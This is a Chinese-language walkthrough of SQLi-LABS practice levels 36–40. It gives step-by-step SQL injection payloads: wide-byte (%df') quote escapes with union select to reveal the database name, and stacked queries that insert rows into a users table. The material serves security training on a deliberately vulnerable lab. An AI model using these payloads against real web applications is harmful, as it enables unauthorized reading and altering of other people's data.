SQLi-LABS 36关

1.本关依旧是宽字节注入

2.测试闭合方式

?id=1                               //正常显示

?id=1'                              //显示错误

?id=1%df'                        //显示错误

?id=1%df' --+                   //显示正常

3.测试回显点

?id=-1%df%27%20union%20select%201,2,3--+

4.使用union select查询数据库名

?id=-1%df%27%20union%20select%201,database(),3--+

SQLi-LABS 37关

1.本关又是post传参，所以需要抓包

 用户名密码分别输入1，进行抓包，然后发送到重放器

 在用户名处进行闭合测试

2.测试之后得到闭合方式为

1%df' --+

3.测试回显点

4.爆数据库名

SQLi-LABS 38关

1.本关使用常规的联合查询方式就可以秒了

但是这关本意是想考差堆叠注入

堆叠注入就是将两个sql语句使用分号隔开，但是依旧执行两条语句

所以，我们这里使用堆叠注入

2.首先测试闭合方式

单引号闭合

3.其次测试是否存在堆叠注入

测试方法就是我们往数据库中插入一条信息，看看是否访问的到

使用语句：

?id=-1';insert into users(id,username,password) values('77','czx','333')--+

 我们这里插入了id为77的信息，接下来输入id=77看是否能够查询到这条信息

结果显而易见，存在堆叠注入

SQLi-LABS 39关

和38关一样，都是堆叠注入，只是变成了数字型

当然，联合注入等常规方式也是可以的

SQLi-LABS 40关

1.依旧是堆叠注入

2.测试闭合

?id=1'           //无回显

?id=1'--+      //依旧没有回显

?id=1')--+     //回显正常

所以是')--+闭合方式

  3.使用insert进行测试是否存在堆叠注入

?id=-1'); insert into users values ('88','xx','88')--+

查询id为88的信息

插入成功，存在堆叠注入